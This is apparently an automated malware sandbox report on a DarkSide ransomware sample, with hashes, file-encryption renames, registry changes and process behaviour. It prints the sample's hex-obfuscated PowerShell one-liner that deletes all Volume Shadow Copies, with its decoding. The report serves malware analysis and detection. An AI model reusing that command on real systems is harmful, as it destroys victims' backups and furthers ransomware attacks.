Analysis
- max time kernel: 117s
- max time network: 119s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 05-01-2022 15:15

Static task: static1

Behavioral task: behavioral1
  Sample: c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe
  Resource: win7-en-20211208

Behavioral task: behavioral2
  Sample: c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe
  Resource: win10-en-20211208
General
- Target: c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe
- Size: 260KB
- MD5: ce7b2f7008ab93c659494f2931160147
- SHA1: ed2aec7ebbcb87059b707aa98bd300c8d75f3acd
- SHA256: c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc
- SHA512: 6b81bd235ad199b01ee0801a3e14544a4a720ee0609aaa0df99415dcecf10a114219a96f79f57915701b3f6576ac7259d472519964516a1d92ee4023babab0fb
Malware Config
- Extracted from: C:\\README.08e0b4c3.TXT
- Family: darkside
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
Processes (c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe):
- File renamed: C:\Users\Admin\Pictures\MountComplete.tif => C:\Users\Admin\Pictures\MountComplete.tif.08e0b4c3
- File opened for modification: C:\Users\Admin\Pictures\MountComplete.tif.08e0b4c3
- File renamed: C:\Users\Admin\Pictures\UnblockConvert.crw => C:\Users\Admin\Pictures\UnblockConvert.crw.08e0b4c3
- File opened for modification: C:\Users\Admin\Pictures\UnblockConvert.crw.08e0b4c3
- File renamed: C:\Users\Admin\Pictures\UseRedo.crw => C:\Users\Admin\Pictures\UseRedo.crw.08e0b4c3
- File opened for modification: C:\Users\Admin\Pictures\UseRedo.crw.08e0b4c3
- File renamed: C:\Users\Admin\Pictures\ExportComplete.raw => C:\Users\Admin\Pictures\ExportComplete.raw.08e0b4c3
- File opened for modification: C:\Users\Admin\Pictures\ExportComplete.raw.08e0b4c3
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes (c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe):
- Set value (str): \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\08e0b4c3.BMP"
- Set value (str): \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\08e0b4c3.BMP"
-
Modifies Control Panel 1 IoCs
Processes (c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe):
- Set value (str): \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Control Panel\Desktop\WallpaperStyle = "10"
-
Modifies registry class 5 IoCs
Processes (c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe):
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.08e0b4c3
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.08e0b4c3\ = "08e0b4c3"
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\08e0b4c3\DefaultIcon
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\08e0b4c3
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\08e0b4c3\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\08e0b4c3.ico"
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes (powershell.exe, c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe):
- pid 2288 powershell.exe
- pid 2288 powershell.exe
- pid 2288 powershell.exe
- pid 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe
- pid 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes (c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe, powershell.exe, vssvc.exe), grouped by pid:
- pid 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe, Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- pid 2288 powershell.exe, Token: SeDebugPrivilege
- pid 620 vssvc.exe, Token: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes (c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe):
- PID 4016 wrote to memory of 2288: c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe -> powershell.exe
- PID 4016 wrote to memory of 2288: c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe -> powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe (level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe"
  - Modifies extensions of user files
  - Sets desktop wallpaper using registry
  - Modifies Control Panel
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2, child of the above)
    Command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
    (The hex string decodes byte by byte to the command it then executes via iex: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, i.e. deletion of all Volume Shadow Copies, which accounts for the vssvc.exe activity below.)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (level 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: ea6243fdb2bfcca2211884b0a21a0afc
  SHA1: 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
  SHA256: 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
  SHA512: 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 2a8e26e48e324de3e4881b1c71cd83a9
  SHA1: 7bd20805009f8aa0ad63766d439f628969a19810
  SHA256: 49a6d5b9a5a3be5ec6c9c9637591dec814d79fde4ac4319e36525e2183f89488
  SHA512: 0eafb6fd87d7714f517717caf5b77097ffa090363ed72778f34bb0b158f733fb30fce7722929b3e54ca2e3a8e90961f3c81a837814d9bff770150d161cb541a3
Memory dumps (pid-index-range, Filesize):
- memory/2288-126-0x000001FA0A010000-0x000001FA0A012000-memory.dmp  Filesize: 8KB
- memory/2288-127-0x000001FA0A010000-0x000001FA0A012000-memory.dmp  Filesize: 8KB
- memory/2288-119-0x000001FA0A010000-0x000001FA0A012000-memory.dmp  Filesize: 8KB
- memory/2288-121-0x000001FA0A010000-0x000001FA0A012000-memory.dmp  Filesize: 8KB
- memory/2288-122-0x000001FA0A010000-0x000001FA0A012000-memory.dmp  Filesize: 8KB
- memory/2288-123-0x000001FA0A010000-0x000001FA0A012000-memory.dmp  Filesize: 8KB
- memory/2288-124-0x000001FA243E0000-0x000001FA24402000-memory.dmp  Filesize: 136KB
- memory/2288-125-0x000001FA0A010000-0x000001FA0A012000-memory.dmp  Filesize: 8KB
- memory/2288-118-0x0000000000000000-mapping.dmp
- memory/2288-120-0x000001FA0A010000-0x000001FA0A012000-memory.dmp  Filesize: 8KB
- memory/2288-128-0x000001FA0A010000-0x000001FA0A012000-memory.dmp  Filesize: 8KB
- memory/2288-129-0x000001FA0A110000-0x000001FA0A112000-memory.dmp  Filesize: 8KB
- memory/2288-130-0x000001FA0A113000-0x000001FA0A115000-memory.dmp  Filesize: 8KB
- memory/2288-131-0x000001FA24590000-0x000001FA24606000-memory.dmp  Filesize: 472KB
- memory/2288-132-0x000001FA0A010000-0x000001FA0A012000-memory.dmp  Filesize: 8KB
- memory/2288-142-0x000001FA0A116000-0x000001FA0A118000-memory.dmp  Filesize: 8KB
- memory/2288-147-0x000001FA0A010000-0x000001FA0A012000-memory.dmp  Filesize: 8KB
- memory/4016-117-0x0000000000400000-0x000000000083C000-memory.dmp  Filesize: 4.2MB
- memory/4016-116-0x0000000000030000-0x0000000000040000-memory.dmp  Filesize: 64KB